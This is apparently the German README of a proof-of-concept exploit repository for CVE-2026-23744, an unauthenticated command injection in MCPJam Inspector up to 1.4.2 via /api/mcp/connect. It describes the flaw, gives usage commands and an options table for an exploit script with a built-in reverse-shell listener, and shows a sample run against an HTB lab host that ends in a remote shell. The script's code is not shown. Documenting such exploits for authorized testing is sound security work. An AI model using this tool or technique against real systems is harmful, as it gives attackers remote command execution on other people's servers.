
CVE-2026-23744 ist eine nicht authentifizierte Befehlsinjizierung in MCPJam Inspector ≤1.4.2 über /api/mcp/connect. Dieser POC nutzt sie aus, indem er eine manipulierte JSON-Nutzlast sendet, um beliebige Befehle auszuführen und eine Reverse Shell mit PTY zu ermöglichen.
Dieser Proof-of-Concept wird ausschließlich für autorisierte Sicherheitsforschung, Bildungszwecke und kontrollierte Laborumgebungen (z. B. HTB, CTF oder interne Penetrationstests mit ausdrücklicher schriftlicher Zustimmung) bereitgestellt. Die unbefugte Nutzung gegen ein System ohne Erlaubnis ist illegal und unethisch. Der Autor übernimmt keine Haftung für Missbrauch; die Nutzer sind allein dafür verantwortlich, alle geltenden Gesetze und Vorschriften einzuhalten.
CVE-2026-23744 ist eine Schwachstelle zur nicht authentifizierten Befehlsinjizierung in MCPJam Inspector (Version ≤ 1.4.2).
Der Endpoint /api/mcp/connect akzeptiert eine JSON-Payload mit serverConfig.command und serverConfig.args und übergibt sie ohne jegliche Bereinigung direkt an einen Systemprozess-Spawn. Ein Angreifer kann eine manipulierte Anfrage senden, um beliebige Systembefehle auszuführen und eine Reverse Shell mit den Privilegien des Dienstbenutzers zu erhalten.
Dieses Repository enthält ein voll funktionsfähiges Exploit-Skript mit einem optionalen automatischen interaktiven Listener auf PTY-Basis (standardmäßig aktiviert).
requests-Bibliothek (pip install requests)Wichtig: Gib nur den Hostnamen oder die IP an. Das Skript fügt automatisch http:// oder https:// hinzu
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
Das Skript startet einen eigenen Listener und gibt dir direkt in deinem Terminal eine Shell.
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!
# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)
root.Dieses Repository dient ausschließlich Bildungs- und autorisierten Testzwecken. Nutzung auf eigene Gefahr.
Autor: Mluex0
Datum: August 2026
| Option | Beschreibung |
|---|
-t, --target | Ziel-Hostname oder IP (erforderlich) |
-p, --port | Ziel-Port (Standard: 6274) |
-l, --lhost | Deine IP für die Reverse Shell (erforderlich) |
-r, --lport | Dein Listener-Port (Standard: 4444) |
--ssl | HTTPS statt HTTP verwenden |
--check-only | Nur die Schwachstelle prüfen, keine Shell senden |